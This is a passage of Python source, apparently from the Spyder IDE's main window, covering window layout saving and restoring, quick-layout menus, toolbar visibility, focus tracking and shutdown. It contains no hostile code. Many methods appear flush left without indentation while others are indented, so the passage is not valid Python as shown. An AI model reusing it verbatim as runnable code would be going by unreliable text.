        # Server to maintain just one Spyder instance and open files in it if
        # the user tries to start other instances with
        # $ spyder foo.py
        if CONF.get('main', 'single_instance') and not self.new_instance:
            # Daemon thread so it never blocks application exit
            t = threading.Thread(target=self.start_open_files_server)
            t.setDaemon(True)
            t.start()
            # Connect the window to the signal emitted by the previous server
            # when it gets a client connected to it
            self.sig_open_external_file.connect(self.open_external_file)
        # Create Plugins and toolbars submenus
        self.create_plugins_menu()
        self.create_toolbars_menu()
        self.extconsole.setMinimumHeight(0)
        # Update toolbar visibility status
        self.toolbars_visible = CONF.get('main', 'toolbars_visible')
        self.load_last_visible_toolbars()
        # Update lock status of dockwidgets (panes)
        self.lock_dockwidgets_action.setChecked(self.dockwidgets_locked)
        self.apply_panes_settings()
        # Hide Internal Console so that people don't use it instead of
        # the External or IPython ones
        if self.console.dockwidget.isVisible() and DEV is None:
            self.console.toggle_view_action.setChecked(False)
            self.console.dockwidget.hide()
        # Show Help and Consoles by default
        plugins_to_show = []
        if self.help is not None:
            plugins_to_show.append(self.help)
        # Raise order: the last-raised plugin ends up on top, so the
        # visible console goes last in the list.
        if self.ipyconsole is not None:
            if self.ipyconsole.isvisible:
                plugins_to_show += [self.extconsole, self.ipyconsole]
            else:
                plugins_to_show += [self.ipyconsole, self.extconsole]
        else:
            plugins_to_show += [self.extconsole]
        for plugin in plugins_to_show:
            if plugin.dockwidget.isVisible():
                plugin.dockwidget.raise_()
        # Show history file if no console is visible
        ipy_visible = self.ipyconsole is not None and self.ipyconsole.isvisible
        if not self.extconsole.isvisible and not ipy_visible:
            self.historylog.add_history(get_conf_path('history.py'))
        # Load last opened project (if a project was active when spyder closed)
        if self.projects is not None:
            self.projects.reopen_last_project()
        # Give focus to the Editor setup opened files
        if self.editor.dockwidget.isVisible():
            # Load files
            self.editor.setup_open_files()
            try:
                self.editor.get_focus_widget().setFocus()
            except AttributeError:
                # Best-effort: the editor may have no focusable widget yet
                pass
        # Check for spyder updates
        if DEV is None and CONF.get('main', 'check_updates_on_startup'):
            self.give_updates_feedback = False
            self.check_updates()
        self.report_missing_dependencies()
        self.is_setting_up = False
def update_window_title(self):
"""Update main spyder window title based on projects."""
title = self.base_title
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), '~')
title = '{0} - {1}'.format(path, title)
self.setWindowTitle(title)
def report_missing_dependencies(self):
"""Show a QMessageBox with a list of missing hard dependencies"""
missing_deps = dependencies.missing_dependencies()
if missing_deps:
QMessageBox.critical(self, _('Error'),
_("<b>You have missing dependencies!</b>"
"<br><br><tt>%s</tt><br><br>"
"<b>Please install them to avoid this message.</b>"
"<br><br>"
"<i>Note</i>: Spyder could work without some of these "
"dependencies, however to have a smooth experience when "
"using Spyder we <i>strongly</i> recommend you to install "
"all the listed missing dependencies.<br><br>"
"Failing to install these dependencies might result in bugs. "
"Please be sure that any found bugs are not the direct "
"result of missing dependencies, prior to reporting a new "
"issue."
) % missing_deps, QMessageBox.Ok)
def load_window_settings(self, prefix, default=False, section='main'):
"""Load window layout settings from userconfig-based configuration
with *prefix*, under *section*
default: if True, do not restore inner layout"""
get_func = CONF.get_default if default else CONF.get
window_size = get_func(section, prefix+'size')
prefs_dialog_size = get_func(section, prefix+'prefs_dialog_size')
if default:
hexstate = None
else:
hexstate = get_func(section, prefix+'state', None)
pos = get_func(section, prefix+'position')
is_maximized = get_func(section, prefix+'is_maximized')
is_fullscreen = get_func(section, prefix+'is_fullscreen')
return hexstate, window_size, prefs_dialog_size, pos, is_maximized, \
is_fullscreen
def get_window_settings(self):
"""Return current window settings
Symetric to the 'set_window_settings' setter"""
window_size = (self.window_size.width(), self.window_size.height())
is_fullscreen = self.isFullScreen()
if is_fullscreen:
is_maximized = self.maximized_flag
else:
is_maximized = self.isMaximized()
pos = (self.window_position.x(), self.window_position.y())
prefs_dialog_size = (self.prefs_dialog_size.width(),
self.prefs_dialog_size.height())
hexstate = qbytearray_to_str(self.saveState())
return (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen)
    def set_window_settings(self, hexstate, window_size, prefs_dialog_size,
                            pos, is_maximized, is_fullscreen):
        """Set window settings
        Symetric to the 'get_window_settings' accessor"""
        # Suspend repaints while the geometry/state is being restored
        self.setUpdatesEnabled(False)
        self.window_size = QSize(window_size[0], window_size[1]) # width,height
        self.prefs_dialog_size = QSize(prefs_dialog_size[0],
                                       prefs_dialog_size[1]) # width,height
        self.window_position = QPoint(pos[0], pos[1]) # x,y
        # Start from a normal (non-maximized, non-fullscreen) state before
        # applying size, position and the saved dockwidget layout
        self.setWindowState(Qt.WindowNoState)
        self.resize(self.window_size)
        self.move(self.window_position)
        # Window layout
        if hexstate:
            self.restoreState( QByteArray().fromHex(
                    str(hexstate).encode('utf-8')) )
            # [Workaround for Issue 880]
            # QDockWidget objects are not painted if restored as floating
            # windows, so we must dock them before showing the mainwindow.
            for widget in self.children():
                if isinstance(widget, QDockWidget) and widget.isFloating():
                    self.floating_dockwidgets.append(widget)
                    widget.setFloating(False)
        # Is fullscreen?
        if is_fullscreen:
            self.setWindowState(Qt.WindowFullScreen)
            self.__update_fullscreen_action()
        # Is maximized?
        if is_fullscreen:
            # In fullscreen only record the flag; the real maximized state
            # is re-applied when fullscreen is left
            self.maximized_flag = is_maximized
        elif is_maximized:
            self.setWindowState(Qt.WindowMaximized)
        self.setUpdatesEnabled(True)
def save_current_window_settings(self, prefix, section='main'):
"""Save current window settings with *prefix* in
the userconfig-based configuration, under *section*"""
win_size = self.window_size
prefs_size = self.prefs_dialog_size
CONF.set(section, prefix+'size', (win_size.width(), win_size.height()))
CONF.set(section, prefix+'prefs_dialog_size',
(prefs_size.width(), prefs_size.height()))
CONF.set(section, prefix+'is_maximized', self.isMaximized())
CONF.set(section, prefix+'is_fullscreen', self.isFullScreen())
pos = self.window_position
CONF.set(section, prefix+'position', (pos.x(), pos.y()))
self.maximize_dockwidget(restore=True)# Restore non-maximized layout
qba = self.saveState()
CONF.set(section, prefix+'state', qbytearray_to_str(qba))
CONF.set(section, prefix+'statusbar',
not self.statusBar().isHidden())
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets"""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
# --- Layouts
    def setup_layout(self, default=False):
        """Setup window layout

        default: if True, load the factory-default settings instead of the
        user's saved ones."""
        prefix = 'window' + '/'
        settings = self.load_window_settings(prefix, default)
        hexstate = settings[0]
        self.first_spyder_run = False
        # No saved window state means this is the first run (or a reset):
        # build the default layouts and seed the quick-layout slots.
        if hexstate is None:
            # First Spyder execution:
            self.setWindowState(Qt.WindowMaximized)
            self.first_spyder_run = True
            self.setup_default_layouts('default', settings)
            self.extconsole.setMinimumHeight(250)
            # Now that the initial setup is done, copy the window settings,
            # except for the hexstate in the quick layouts sections for the
            # default layouts.
            # Order and name of the default layouts is found in config.py
            section = 'quick_layouts'
            get_func = CONF.get_default if default else CONF.get
            order = get_func(section, 'order')
            # restore the original defaults if reset layouts is called
            if default:
                CONF.set(section, 'active', order)
                CONF.set(section, 'order', order)
                CONF.set(section, 'names', order)
            for index, name, in enumerate(order):
                prefix = 'layout_{0}/'.format(index)
                self.save_current_window_settings(prefix, section)
                # Clear the copied hexstate so each default layout is
                # regenerated rather than restored from this session
                CONF.set(section, prefix+'state', None)
            # store the initial layout as the default in spyder
            prefix = 'layout_default/'
            section = 'quick_layouts'
            self.save_current_window_settings(prefix, section)
            self.current_quick_layout = 'default'
            CONF.set(section, prefix+'state', None)
            # Regenerate menu
            self.quick_layout_set_menu()
        self.set_window_settings(*settings)
        for plugin in self.widgetlist:
            try:
                plugin.initialize_plugin_in_mainwindow_layout()
            except Exception as error:
                # A faulty plugin must not break layout setup; report and
                # continue with the remaining plugins.
                print("%s: %s" % (plugin, str(error)), file=STDERR)
                traceback.print_exc(file=STDERR)
    def setup_default_layouts(self, index, settings):
        """Set up one of the predefined layouts when run for the first time.

        Parameters
        ----------
        index
            Key into the `layouts` dict below: 'default' or one of the
            MATLAB/RSTUDIO/VERTICAL/HORIZONTAL integer constants.
        settings
            Window settings tuple as returned by `load_window_settings`.
        """
        self.set_window_settings(*settings)
        # Updates are suspended while docks are rearranged and re-enabled
        # later by `layout_fix_timer`.
        self.setUpdatesEnabled(False)
        # IMPORTANT: order has to be the same as defined in the config file
        MATLAB, RSTUDIO, VERTICAL, HORIZONTAL = range(4)
        # define widgets locally
        editor = self.editor
        console_ipy = self.ipyconsole
        console_ext = self.extconsole
        console_int = self.console
        outline = self.outlineexplorer
        explorer_project = self.projects
        explorer_file = self.explorer
        explorer_variable = self.variableexplorer
        history = self.historylog
        finder = self.findinfiles
        help_plugin = self.help
        helper = self.onlinehelp
        plugins = self.thirdparty_plugins
        # Widgets/toolbars hidden in every predefined layout.
        global_hidden_widgets = [finder, console_int, explorer_project,
                                 helper] + plugins
        global_hidden_toolbars = [self.source_toolbar, self.edit_toolbar,
                                  self.search_toolbar]
        # Layout definition
        # layouts are organized by columns, each column is organized by rows
        # widths have to add 1.0, height per column have to add 1.0
        # Spyder Default Initial Layout
        s_layout = {'widgets': [
            # column 0
            [[explorer_project]],
            # column 1
            [[editor]],
            # column 2
            [[outline]],
            # column 3
            [[help_plugin, explorer_variable, helper, explorer_file,
              finder] + plugins,
             [console_int, console_ext, console_ipy, history]]
            ],
            'width fraction': [0.0,             # column 0 width
                               0.55,            # column 1 width
                               0.0,             # column 2 width
                               0.45],           # column 3 width
            'height fraction': [[1.0],          # column 0, row heights
                                [1.0],          # column 1, row heights
                                [1.0],          # column 2, row heights
                                [0.46, 0.54]],  # column 3, row heights
            'hidden widgets': [outline],
            'hidden toolbars': [],
        }
        r_layout = {'widgets': [
            # column 0
            [[editor],
             [console_ipy, console_ext, console_int]],
            # column 1
            [[explorer_variable, history, outline, finder] + plugins,
             [explorer_file, explorer_project, help_plugin, helper]]
            ],
            'width fraction': [0.55,            # column 0 width
                               0.45],           # column 1 width
            'height fraction': [[0.55, 0.45],   # column 0, row heights
                                [0.55, 0.45]],  # column 1, row heights
            'hidden widgets': [outline],
            'hidden toolbars': [],
        }
        # Matlab
        m_layout = {'widgets': [
            # column 0
            [[explorer_file, explorer_project],
             [outline]],
            # column 1
            [[editor],
             [console_ipy, console_ext, console_int]],
            # column 2
            [[explorer_variable, finder] + plugins,
             [history, help_plugin, helper]]
            ],
            'width fraction': [0.20,            # column 0 width
                               0.40,            # column 1 width
                               0.40],           # column 2 width
            'height fraction': [[0.55, 0.45],   # column 0, row heights
                                [0.55, 0.45],   # column 1, row heights
                                [0.55, 0.45]],  # column 2, row heights
            'hidden widgets': [],
            'hidden toolbars': [],
        }
        # Vertically split
        v_layout = {'widgets': [
            # column 0
            [[editor],
             [console_ipy, console_ext, console_int, explorer_file,
              explorer_project, help_plugin, explorer_variable,
              history, outline, finder, helper] + plugins]
            ],
            'width fraction': [1.0],            # column 0 width
            'height fraction': [[0.55, 0.45]],  # column 0, row heights
            'hidden widgets': [outline],
            'hidden toolbars': [],
        }
        # Horizontally split
        h_layout = {'widgets': [
            # column 0
            [[editor]],
            # column 1
            [[console_ipy, console_ext, console_int, explorer_file,
              explorer_project, help_plugin, explorer_variable,
              history, outline, finder, helper] + plugins]
            ],
            'width fraction': [0.55,            # column 0 width
                               0.45],           # column 1 width
            'height fraction': [[1.0],          # column 0, row heights
                                [1.0]],         # column 1, row heights
            'hidden widgets': [outline],
            'hidden toolbars': []
        }
        # Layout selection
        layouts = {'default': s_layout,
                   RSTUDIO: r_layout,
                   MATLAB: m_layout,
                   VERTICAL: v_layout,
                   HORIZONTAL: h_layout}
        layout = layouts[index]
        # Flatten the column/row structure into a simple widget list.
        widgets_layout = layout['widgets']
        widgets = []
        for column in widgets_layout :
            for row in column:
                for widget in row:
                    if widget is not None:
                        widgets.append(widget)
        # Make every widget visible
        for widget in widgets:
            widget.toggle_view(True)
            action = widget.toggle_view_action
            action.setChecked(widget.dockwidget.isVisible())
        # Set the widgets horizontally
        for i in range(len(widgets) - 1):
            first, second = widgets[i], widgets[i+1]
            if first is not None and second is not None:
                self.splitDockWidget(first.dockwidget, second.dockwidget,
                                     Qt.Horizontal)
        # Arrange rows vertically
        for column in widgets_layout :
            for i in range(len(column) - 1):
                first_row, second_row = column[i], column[i+1]
                if first_row is not None and second_row is not None:
                    self.splitDockWidget(first_row[0].dockwidget,
                                         second_row[0].dockwidget,
                                         Qt.Vertical)
        # Tabify
        for column in widgets_layout :
            for row in column:
                for i in range(len(row) - 1):
                    first, second = row[i], row[i+1]
                    if first is not None and second is not None:
                        self.tabify_plugins(first, second)
                # Raise front widget per row
                row[0].dockwidget.show()
                row[0].dockwidget.raise_()
        # Hide toolbars
        hidden_toolbars = global_hidden_toolbars + layout['hidden toolbars']
        for toolbar in hidden_toolbars:
            if toolbar is not None:
                toolbar.close()
        # Hide widgets
        hidden_widgets = global_hidden_widgets + layout['hidden widgets']
        for widget in hidden_widgets:
            if widget is not None:
                widget.dockwidget.close()
        # set the width and height
        self._layout_widget_info = []
        width, height = self.window_size.width(), self.window_size.height()
        # fix column width
#        for c in range(len(widgets_layout)):
#            widget = widgets_layout[c][0][0].dockwidget
#            min_width, max_width = widget.minimumWidth(), widget.maximumWidth()
#            info = {'widget': widget,
#                    'min width': min_width,
#                    'max width': max_width}
#            self._layout_widget_info.append(info)
#            new_width = int(layout['width fraction'][c] * width * 0.95)
#            widget.setMinimumWidth(new_width)
#            widget.setMaximumWidth(new_width)
#            widget.updateGeometry()
#            print(c, widgets_layout[c][0][0], new_width)
        # fix column height
        for c, column in enumerate(widgets_layout):
            for r in range(len(column) - 1):
                widget = column[r][0]
                dockwidget = widget.dockwidget
                dock_min_h = dockwidget.minimumHeight()
                dock_max_h = dockwidget.maximumHeight()
                # Original min/max heights are saved so layout_fix_timer
                # can restore them after the layout settles.
                info = {'widget': widget,
                        'dock min height': dock_min_h,
                        'dock max height': dock_max_h}
                self._layout_widget_info.append(info)
                # The 0.95 factor is to adjust height based on useful
                # estimated area in the window
                new_height = int(layout['height fraction'][c][r]*height*0.95)
                dockwidget.setMinimumHeight(new_height)
                dockwidget.setMaximumHeight(new_height)
        # Give Qt time to apply the forced sizes, then release the
        # constraints (see layout_fix_timer).
        self._custom_layout_timer = QTimer(self)
        self._custom_layout_timer.timeout.connect(self.layout_fix_timer)
        self._custom_layout_timer.setSingleShot(True)
        self._custom_layout_timer.start(5000)
def layout_fix_timer(self):
"""Fixes the height of docks after a new layout is set."""
info = self._layout_widget_info
for i in info:
dockwidget = i['widget'].dockwidget
if 'dock min width' in i:
dockwidget.setMinimumWidth(i['dock min width'])
dockwidget.setMaximumWidth(i['dock max width'])
if 'dock min height' in i:
dockwidget.setMinimumHeight(i['dock min height'])
dockwidget.setMaximumHeight(i['dock max height'])
dockwidget.updateGeometry()
self.setUpdatesEnabled(True)
    @Slot()
    def toggle_previous_layout(self):
        """Switch to the previous layout in the quick layout rotation."""
        self.toggle_layout('previous')
    @Slot()
    def toggle_next_layout(self):
        """Switch to the next layout in the quick layout rotation."""
        self.toggle_layout('next')
def toggle_layout(self, direction='next'):
""" """
get = CONF.get
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
if len(active) == 0:
return
layout_index = ['default']
for name in order:
if name in active:
layout_index.append(names.index(name))
current_layout = self.current_quick_layout
dic = {'next': 1, 'previous': -1}
if current_layout is None:
# Start from default
current_layout = 'default'
if current_layout in layout_index:
current_index = layout_index.index(current_layout)
else:
current_index = 0
new_index = (current_index + dic[direction]) % len(layout_index)
self.quick_layout_switch(layout_index[new_index])
    def quick_layout_set_menu(self):
        """Rebuild the quick layouts menu from the current config state."""
        get = CONF.get
        names = get('quick_layouts', 'names')
        order = get('quick_layouts', 'order')
        active = get('quick_layouts', 'active')
        # NOTE(review): this empty-list assignment is immediately
        # overwritten by the next statement and could be removed.
        ql_actions = []
        ql_actions = [create_action(self, _('Spyder Default Layout'),
                                    triggered=lambda:
                                    self.quick_layout_switch('default'))]
        for name in order:
            if name in active:
                index = names.index(name)
                # closure required so lambda works with the default parameter
                def trigger(i=index, self=self):
                    return lambda: self.quick_layout_switch(i)
                qli_act = create_action(self, name, triggered=trigger())
                # closure above replaces the following which stopped working
                # qli_act = create_action(self, name, triggered=lambda i=index:
                #     self.quick_layout_switch(i)
                ql_actions += [qli_act]
        self.ql_save = create_action(self, _("Save current layout"),
                                     triggered=lambda:
                                     self.quick_layout_save(),
                                     context=Qt.ApplicationShortcut)
        self.ql_preferences = create_action(self, _("Layout preferences"),
                                            triggered=lambda:
                                            self.quick_layout_settings(),
                                            context=Qt.ApplicationShortcut)
        self.ql_reset = create_action(self, _('Reset to spyder default'),
                                      triggered=self.reset_window_layout)
        self.register_shortcut(self.ql_save, "_", "Save current layout")
        self.register_shortcut(self.ql_preferences, "_", "Layout preferences")
        # A None entry becomes a menu separator.
        ql_actions += [None]
        ql_actions += [self.ql_save, self.ql_preferences, self.ql_reset]
        self.quick_layout_menu.clear()
        add_actions(self.quick_layout_menu, ql_actions)
        # The preferences entry is useless while no quick layout exists.
        if len(order) == 0:
            self.ql_preferences.setEnabled(False)
        else:
            self.ql_preferences.setEnabled(True)
    @Slot()
    def reset_window_layout(self):
        """Reset window layout to default, after user confirmation."""
        answer = QMessageBox.warning(self, _("Warning"),
                     _("Window layout will be reset to default settings: "
                       "this affects window position, size and dockwidgets.\n"
                       "Do you want to continue?"),
                     QMessageBox.Yes | QMessageBox.No)
        if answer == QMessageBox.Yes:
            # default=True discards the stored settings.
            self.setup_layout(default=True)
    def quick_layout_save(self):
        """Show the save-layout dialog and persist the chosen layout.

        Overwriting an existing name asks for confirmation; a new name is
        appended (reusing a None slot in `names` if one exists) and is
        always made active.
        """
        get = CONF.get
        set_ = CONF.set
        names = get('quick_layouts', 'names')
        order = get('quick_layouts', 'order')
        active = get('quick_layouts', 'active')
        dlg = self.dialog_layout_save(self, names)
        if dlg.exec_():
            name = dlg.combo_box.currentText()
            if name in names:
                # NOTE(review): the backslash continuations embed the
                # source indentation inside the translated string; kept
                # as-is because changing it would break the gettext key.
                answer = QMessageBox.warning(self, _("Warning"),
                                             _("Layout <b>%s</b> will be \
                                               overwritten. Do you want to \
                                               continue?") % name,
                                             QMessageBox.Yes | QMessageBox.No)
                index = order.index(name)
            else:
                answer = True
                if None in names:
                    index = names.index(None)
                    names[index] = name
                else:
                    index = len(names)
                    names.append(name)
                order.append(name)
            # Always make active a new layout even if it overwrites an inactive
            # layout
            if name not in active:
                active.append(name)
            if answer:
                self.save_current_window_settings('layout_{}/'.format(index),
                                                  section='quick_layouts')
                set_('quick_layouts', 'names', names)
                set_('quick_layouts', 'order', order)
                set_('quick_layouts', 'active', active)
                self.quick_layout_set_menu()
def quick_layout_settings(self):
"""Layout settings dialog"""
get = CONF.get
set_ = CONF.set
section = 'quick_layouts'
names = get(section, 'names')
order = get(section, 'order')
active = get(section, 'active')
dlg = self.dialog_layout_settings(self, names, order, active)
if dlg.exec_():
set_(section, 'names', dlg.names)
set_(section, 'order', dlg.order)
set_(section, 'active', dlg.active)
self.quick_layout_set_menu()
    def quick_layout_switch(self, index):
        """Switch to quick layout number *index* ('default' or an int)."""
        section = 'quick_layouts'
        try:
            settings = self.load_window_settings('layout_{}/'.format(index),
                                                 section=section)
            (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
             is_fullscreen) = settings
            # The default layouts will always be regenerated unless there was
            # an overwrite, either by rewriting with same name, or by deleting
            # and then creating a new one
            if hexstate is None:
                self.setup_default_layouts(index, settings)
        except cp.NoOptionError:
            QMessageBox.critical(self, _("Warning"),
                                 _("Quick switch layout #%s has not yet "
                                   "been defined.") % str(index))
            return
            # TODO: is there any real use in calling the previous layout
            # setting?
            # self.previous_layout_settings = self.get_window_settings()
        self.set_window_settings(*settings)
        self.current_quick_layout = index
        # make sure the flags are correctly set for visible panes
        for plugin in self.widgetlist:
            action = plugin.toggle_view_action
            action.setChecked(plugin.dockwidget.isVisible())
# --- Show/Hide toolbars
def _update_show_toolbars_action(self):
"""Update the text displayed in the menu entry."""
if self.toolbars_visible:
text = _("Hide toolbars")
tip = _("Hide toolbars")
else:
text = _("Show toolbars")
tip = _("Show toolbars")
self.show_toolbars_action.setText(text)
self.show_toolbars_action.setToolTip(tip)
def save_visible_toolbars(self):
"""Saves the name of the visible toolbars in the .ini file."""
toolbars = []
for toolbar in self.visible_toolbars:
toolbars.append(toolbar.objectName())
CONF.set('main', 'last_visible_toolbars', toolbars)
def get_visible_toolbars(self):
"""Collects the visible toolbars."""
toolbars = []
for toolbar in self.toolbarslist:
if toolbar.toggleViewAction().isChecked():
toolbars.append(toolbar)
self.visible_toolbars = toolbars
def load_last_visible_toolbars(self):
"""Loads the last visible toolbars from the .ini file."""
toolbars_names = CONF.get('main', 'last_visible_toolbars', default=[])
if toolbars_names:
dic = {}
for toolbar in self.toolbarslist:
dic[toolbar.objectName()] = toolbar
toolbars = []
for name in toolbars_names:
if name in dic:
toolbars.append(dic[name])
self.visible_toolbars = toolbars
else:
self.get_visible_toolbars()
self._update_show_toolbars_action()
    @Slot()
    def show_toolbars(self):
        """Show/Hides toolbars."""
        value = not self.toolbars_visible
        CONF.set('main', 'toolbars_visible', value)
        if value:
            # About to show them again: reuse the list saved when hiding.
            self.save_visible_toolbars()
        else:
            # About to hide them: remember which ones were visible.
            self.get_visible_toolbars()
        for toolbar in self.visible_toolbars:
            toolbar.toggleViewAction().setChecked(value)
            toolbar.setVisible(value)
        self.toolbars_visible = value
        self._update_show_toolbars_action()
# --- Other
    def plugin_focus_changed(self):
        """Focus has changed from one plugin to another.

        Refreshes the Edit/Search menus and keeps Help and the Variable
        Explorer in sync with whichever console now has focus.
        """
        self.update_edit_menu()
        self.update_search_menu()
        # Now deal with Python shell and IPython plugins
        shell = get_focus_python_shell()
        if shell is not None:
            # A Python shell widget has focus
            self.last_console_plugin_focus_was_python = True
            if self.help is not None:
                #  Help may be disabled in .spyder.ini
                self.help.set_shell(shell)
            from spyder.widgets.externalshell import pythonshell
            if isinstance(shell, pythonshell.ExtPythonShellWidget):
                shell = shell.parent()
            self.variableexplorer.set_shellwidget_from_id(id(shell))
        elif self.ipyconsole is not None:
            focus_client = self.ipyconsole.get_focus_client()
            if focus_client is not None:
                self.last_console_plugin_focus_was_python = False
                kwid = focus_client.kernel_widget_id
                if kwid is not None:
                    idx = self.extconsole.get_shell_index_from_id(kwid)
                    if idx is not None:
                        kw = self.extconsole.shellwidgets[idx]
                        if self.help is not None:
                            self.help.set_shell(kw)
                        self.variableexplorer.set_shellwidget_from_id(kwid)
                        # Setting the kernel widget as current widget for the
                        # external console's tabwidget: this is necessary for
                        # the editor/console link to be working (otherwise,
                        # features like "Execute in current interpreter" will
                        # not work with IPython clients unless the associated
                        # IPython kernel has been selected in the external
                        # console... that's not brilliant, but it works for
                        # now: we shall take action on this later
                        self.extconsole.tabwidget.setCurrentWidget(kw)
                        focus_client.get_control().setFocus()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu"""
for element in getattr(self, menu + '_menu_actions'):
if element and isinstance(element, QAction):
if element._shown_shortcut is not None:
element.setShortcut(element._shown_shortcut)
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu"""
for element in getattr(self, menu + '_menu_actions'):
if element and isinstance(element, QAction):
if element._shown_shortcut is not None:
element.setShortcut(QKeySequence())
    def update_edit_menu(self):
        """Enable/disable Edit menu actions based on the focused widget."""
        if self.menuBar().hasFocus():
            return
        # Disabling all actions to begin with
        for child in self.edit_menu.actions():
            child.setEnabled(False)
        widget, textedit_properties = get_focus_widget_properties()
        if textedit_properties is None: # widget is not an editor/console
            return
        #!!! Below this line, widget is expected to be a QPlainTextEdit instance
        console, not_readonly, readwrite_editor = textedit_properties
        # Editor has focus and there is no file opened in it
        if not console and not_readonly and not self.editor.is_file_opened():
            return
        self.selectall_action.setEnabled(True)
        # Undo, redo
        self.undo_action.setEnabled( readwrite_editor \
                                     and widget.document().isUndoAvailable() )
        self.redo_action.setEnabled( readwrite_editor \
                                     and widget.document().isRedoAvailable() )
        # Copy, cut, paste, delete
        has_selection = widget.has_selected_text()
        self.copy_action.setEnabled(has_selection)
        self.cut_action.setEnabled(has_selection and not_readonly)
        self.paste_action.setEnabled(not_readonly)
        # Comment, uncomment, indent, unindent...
        if not console and not_readonly:
            # This is the editor and current file is writable
            for action in self.editor.edit_menu_actions:
                action.setEnabled(True)
    def update_search_menu(self):
        """Enable/disable Search menu actions based on the focused widget."""
        if self.menuBar().hasFocus():
            return
        widget, textedit_properties = get_focus_widget_properties()
        # Editor-specific search actions only apply inside the editor.
        for action in self.editor.search_menu_actions:
            action.setEnabled(self.editor.isAncestorOf(widget))
        if textedit_properties is None: # widget is not an editor/console
            return
        #!!! Below this line, widget is expected to be a QPlainTextEdit instance
        _x, _y, readwrite_editor = textedit_properties
        # Disable the replace action for read-only files
        self.search_menu_actions[3].setEnabled(readwrite_editor)
def create_plugins_menu(self):
order = ['editor', 'console', 'ipython_console', 'variable_explorer',
'help', None, 'explorer', 'outline_explorer',
'project_explorer', 'find_in_files', None, 'historylog',
'profiler', 'breakpoints', 'pylint', None,
'onlinehelp', 'internal_console']
for plugin in self.widgetlist:
action = plugin.toggle_view_action
action.setChecked(plugin.dockwidget.isVisible())
try:
name = plugin.CONF_SECTION
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
actions = order[:]
for action in order:
if type(action) is str:
actions.remove(action)
self.plugins_menu_actions = actions
add_actions(self.plugins_menu, actions)
def create_toolbars_menu(self):
order = ['file_toolbar', 'run_toolbar', 'debug_toolbar',
'main_toolbar', 'Global working directory', None,
'search_toolbar', 'edit_toolbar', 'source_toolbar']
for toolbar in self.toolbarslist:
action = toolbar.toggleViewAction()
name = toolbar.objectName()
try:
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
add_actions(self.toolbars_menu, order)
def createPopupMenu(self):
menu = QMenu('', self)
actions = self.help_menu_actions[:3] + \
[None, self.help_menu_actions[-1]]
add_actions(menu, actions)
return menu
    def set_splash(self, message):
        """Set splash message (and repaint the splash screen)."""
        if message:
            self.debug_print(message)
        self.splash.show()
        self.splash.showMessage(message, Qt.AlignBottom | Qt.AlignCenter |
                                Qt.AlignAbsolute, QColor(Qt.white))
        # Force a repaint so the message is visible during startup work.
        QApplication.processEvents()
    def remove_tmpdir(self):
        """Remove Spyder temporary directory, ignoring any filesystem errors."""
        shutil.rmtree(programs.TEMPDIR, ignore_errors=True)
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
    def resizeEvent(self, event):
        """Reimplement Qt method"""
        # Only track the "normal" geometry; maximized/fullscreen sizes
        # must not overwrite the restorable window size.
        if not self.isMaximized() and not self.fullscreen_flag:
            self.window_size = self.size()
        QMainWindow.resizeEvent(self, event)
        # To be used by the tour to be able to resize
        self.sig_resized.emit(event)
    def moveEvent(self, event):
        """Reimplement Qt method"""
        # Only track the "normal" position (see resizeEvent).
        if not self.isMaximized() and not self.fullscreen_flag:
            self.window_position = self.pos()
        QMainWindow.moveEvent(self, event)
        # To be used by the tour to be able to move
        self.sig_moved.emit(event)
    def hideEvent(self, event):
        """Reimplement Qt method"""
        # NOTE(review): visibility_changed(True) on a hide event looks
        # counter-intuitive; presumably it forces the plugin owning the
        # last-focused widget to refresh — confirm before changing.
        for plugin in self.widgetlist:
            if plugin.isAncestorOf(self.last_focused_widget):
                plugin.visibility_changed(True)
        QMainWindow.hideEvent(self, event)
    def change_last_focused_widget(self, old, now):
        """To keep track of to the last focused widget"""
        # When focus leaves the application (`now` is None) but a window is
        # still active, re-focus it and record the resulting focus widget.
        if (now is None and QApplication.activeWindow() is not None):
            QApplication.activeWindow().setFocus()
            self.last_focused_widget = QApplication.focusWidget()
        elif now is not None:
            self.last_focused_widget = now
    def closing(self, cancelable=False):
        """Exit tasks.

        Returns True when shutdown may proceed; False when the user or any
        plugin vetoed it (only possible if *cancelable* is True).
        """
        if self.already_closed or self.is_starting_up:
            return True
        if cancelable and CONF.get('main', 'prompt_on_exit'):
            reply = QMessageBox.critical(self, 'Spyder',
                                         'Do you really want to exit?',
                                         QMessageBox.Yes, QMessageBox.No)
            if reply == QMessageBox.No:
                return False
        # Persist the window geometry/state before tearing anything down.
        prefix = 'window' + '/'
        self.save_current_window_settings(prefix)
        if CONF.get('main', 'single_instance'):
            self.open_files_server.close()
        # Every plugin gets a chance to veto the shutdown.
        for plugin in self.thirdparty_plugins:
            if not plugin.closing_plugin(cancelable):
                return False
        for widget in self.widgetlist:
            if not widget.closing_plugin(cancelable):
                return False
        self.dialog_manager.close_all()
        if self.toolbars_visible:
            self.save_visible_toolbars()
        self.already_closed = True
        return True
    def add_dockwidget(self, child):
        """Add QDockWidget and toggleViewAction for plugin *child*."""
        dockwidget, location = child.create_dockwidget()
        if CONF.get('main', 'vertical_dockwidget_titlebars'):
            dockwidget.setFeatures(dockwidget.features()|
                                   QDockWidget.DockWidgetVerticalTitleBar)
        self.addDockWidget(location, dockwidget)
        # Registered plugins take part in layout/closing bookkeeping.
        self.widgetlist.append(child)
@Slot()
def close_current_dockwidget(self):
widget = QApplication.focusWidget()
for plugin in self.widgetlist:
if plugin.isAncestorOf(widget):
plugin.dockwidget.hide()
break
    def toggle_lock_dockwidgets(self, value):
        """Lock/Unlock dockwidgets (True locks panes in place)."""
        self.dockwidgets_locked = value
        # Re-apply pane features so the new lock state takes effect.
        self.apply_panes_settings()
        CONF.set('main', 'panes_locked', value)
def __update_maximize_action(self):
if self.state_before_maximizing is None:
text = _("Maximize current pane")
